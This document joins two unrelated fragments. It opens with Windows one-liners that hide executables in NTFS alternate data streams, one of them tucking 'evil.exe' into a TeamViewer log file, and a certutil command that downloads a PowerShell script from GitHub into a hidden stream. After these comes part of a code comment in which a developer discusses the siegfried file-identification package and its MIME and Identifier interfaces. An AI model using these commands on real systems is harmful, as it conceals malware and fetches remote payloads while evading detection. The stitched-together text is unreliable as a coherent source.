type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
| /* | |
| Sorry Steffen, documentation of the siegfried package needs a lot of attention! | |
| Also, I've pretty much just focussed on sf tool's needs without making the package very ergonomic/ easy to use in other contexts. | |
| The reason there is no method to directly access a MIME type is that I've tried to make Identifications as abstract as possible. | |
| I.e. even though the three supported Identifiers (PRONOM, LOC and MIMEInfo) all have a MIME field, it may in future be desirable | |
| to add another Identifier type that doesn't have this information (though I admit that is unlikely!). | |
| The interfaces for Identifier (a set of signatures) and Identification (a result returned by an Identifier) are both defined in | |
| the pkg/core package: http://godoc.org/github.com/richardlehane/siegfried/pkg/core |